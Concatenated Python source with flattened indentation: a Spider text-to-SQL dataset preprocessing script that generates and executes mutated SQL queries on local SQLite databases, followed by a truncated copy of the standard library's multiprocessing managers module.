else:
os.mkdir(path)
print("{} creates".format(path))
def read_json(path):
f = open(path, "r", encoding="utf-8")
content = json.load(f)
f.close()
return content
def write_json(path, data):
f = open(path, "w", encoding="utf-8")
f.write(json.dumps(data, indent=4))
f.close()
def preprocess_spider(rawdata, t):
preprocess = {}
print("preprocess {}".format(t))
for data in tqdm(rawdata):
query = data[Spider_query]
translated_sql, translated_struct_sql = translate_sql(query)
preprocess[query] = translated_struct_sql
print("{} done".format(t))
return preprocess
def execute_sql(c, mutated_sql, return_dict, executable_SQL):
try:
cursor = c.execute(mutated_sql)
if executable_SQL:
if list(cursor):
return_dict[mutated_sql] = mutated_sql
else:
return_dict[mutated_sql] = mutated_sql
except:
pass
def get_dbschema(path):
db_schema = {}
with open(path) as f:
db_file = json.load(f)
for data in db_file:
db_schema[data['db_id']] = {}
for tab_id, col in data['column_names_original']:
if col == '*':
continue
if tab_id not in db_schema[data['db_id']]:
db_schema[data['db_id']][tab_id] = [col, '~', '*']
else:
db_schema[data['db_id']][tab_id] += [col]
return db_schema
def mutate_sql(index, data, time_out, sql_dict, db_schema, db_dir):
manager = Manager()
return_dict = manager.dict()
jobs = []
db_id = data['db_id']
raw_sql = data['query']
sql = data['query_toks']
tables = db_schema[db_id]
db_path = os.path.join(db_dir, db_id, db_id + '.sqlite')
mutated_sqls = []
if raw_sql not in sql_dict:
sql_dict[raw_sql] = []
else:
return
executable_SQL = True
conn = sqlite3.connect(db_path, timeout=10.0)
c = conn.cursor()
try:
cursor = c.execute(raw_sql)
if not list(cursor):
executable_SQL = False
except:
executable_SQL = False
for i in range(mutate_iter_num):
mutated_sql = []
for tok_i, tok in enumerate(sql):
upper_tok = tok.upper()
new_tok = tok
if random.random() > alpha:
for k, v in swap_dict.items():
if upper_tok in v:
swap_tok = random.choice(v)
new_tok = swap_tok if swap_tok != tok.upper() else tok
if random.random() > beta:
for k, v in tables.items():
if '.' in tok:
alias = tok.split('.')[0]
col = tok.split('.')[1]
if col in v or col.capitalize() in v:
col = random.choice(v)
new_tok = alias + '.' + col
else:
if tok in v or tok.capitalize() in v:
new_tok = random.choice(v)
if random.random() > gamma and new_tok != tok:
new_tok = tok + ' , ' + new_tok
if tok.isnumeric() and random.random() < theta:
tok = max(int(tok) + random.randint(-10, 10), 0)
new_tok = str(tok)
mutated_sql.append(new_tok)
mutated_sql = ' '.join(mutated_sql)
mutated_sql = mutated_sql.replace(", ~ ", ",").replace(" ~ ,", ",").replace(", ~ ,", ",").replace("~",
"").replace(
'``', '\"').replace("''", '\"')
if mutated_sql == ' '.join(sql):
continue
p = multiprocessing.Process(target=execute_sql, args=(c, mutated_sql, return_dict, executable_SQL))
jobs.append(p)
p.start()
start = time.time()
while time.time() - start <= time_out:
if not any(p.is_alive() for p in jobs):
break
time.sleep(.1)
else:
print("Timeout with processing: {} \n".format(raw_sql))
for p in jobs:
p.terminate()
p.join()
mutated_sqls = return_dict.values()
mutated_sqls = list(set(mutated_sqls))
sql_dict[raw_sql] = mutated_sqls
if len(mutated_sqls) < 5:
print("SQL {}: {}".format(index, raw_sql))
print(mutated_sqls)
print('Valid Muatation: {}'.format(len(mutated_sqls)), "\n--------------------------------------")
def create_output(t, idir, odir):
rawdir = os.path.join(odir, Raw)
preprocessdir = os.path.join(odir, Preprocess)
mkdir(rawdir)
mkdir(preprocessdir)
if t == 'spider':
traindata = read_json(os.path.join(idir, Spider_train))
otherdata = read_json(os.path.join(idir, Spider_others))
devdata = read_json(os.path.join(idir, Spider_dev))
rawtrain = []
rawdev = []
rawtest = devdata
rawoutofdomain = otherdata
random.shuffle(traindata)
train_len = round(len(traindata) * 0.8)
print("spider raw starts")
for i, data in enumerate(tqdm(traindata)):
if i < train_len:
rawtrain.append(data)
else:
rawdev.append(data)
print("spider raw done")
write_json(os.path.join(rawdir, Trainjson), rawtrain)
write_json(os.path.join(rawdir, Devjson), rawdev)
write_json(os.path.join(rawdir, Testjson), rawtest)
write_json(os.path.join(rawdir, Outofdomainjson), rawoutofdomain)
print("spider preprocess starts")
preprocesstrain = preprocess_spider(rawtrain, 'train')
write_json(os.path.join(preprocessdir, Trainjson), preprocesstrain)
preprocessdev = preprocess_spider(rawdev, 'dev')
write_json(os.path.join(preprocessdir, Devjson), preprocessdev)
preprocesstest = preprocess_spider(rawtest, 'test')
write_json(os.path.join(preprocessdir, Testjson), preprocesstest)
preprocessoutofdomain = preprocess_spider(rawoutofdomain, 'outofdomain')
write_json(os.path.join(preprocessdir, Outofdomainjson), preprocessoutofdomain)
print("spider preprocess done")
print("mutate starts")
db_schema = get_dbschema(os.path.join(idir, Spider_table))
total_data = []
total_data += traindata + devdata + otherdata
sql_dict = {}
for index, data in enumerate(tqdm(total_data)):
time_out = 3
mutate_sql(index, data, time_out, sql_dict, db_schema, os.path.join(idir, Spider_database))
write_json(os.path.join(preprocessdir, Mutationjson), sql_dict)
print("mutate done")
else:
print("spider preprocess starts")
preprocesstrain = preprocess_spider(rawtrain, 'train')
write_json(os.path.join(preprocessdir, Trainjson), preprocesstrain)
print("spider preprocess done")
"""print("mutate starts")
db_schema = get_dbschema(os.path.join(idir, Spider_table))
total_data = []
total_data += traindata + devdata + otherdata
sql_dict = {}
for index, data in enumerate(tqdm(total_data)):
time_out = 3
mutate_sql(index, data, time_out, sql_dict, db_schema, os.path.join(idir, Spider_database))
write_json(os.path.join(preprocessdir, Mutationjson), sql_dict)
print("mutate done")"""
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import types
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
except ImportError:
HAS_SHMEM = False
else:
HAS_SHMEM = True
__all__.append('SharedMemoryManager')
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def _handle_request(self, c):
request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
def handle_request(self, conn):
'''
Handle a new connection
'''
try:
self._handle_request(conn)
except SystemExit:
# Server.serve_client() calls sys.exit(0) on EOF
pass
finally:
conn.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True, manager_owned=False):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref, manager_owned=manager_owned)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = time.monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - time.monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
__class_getitem__ = classmethod(types.GenericAlias)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
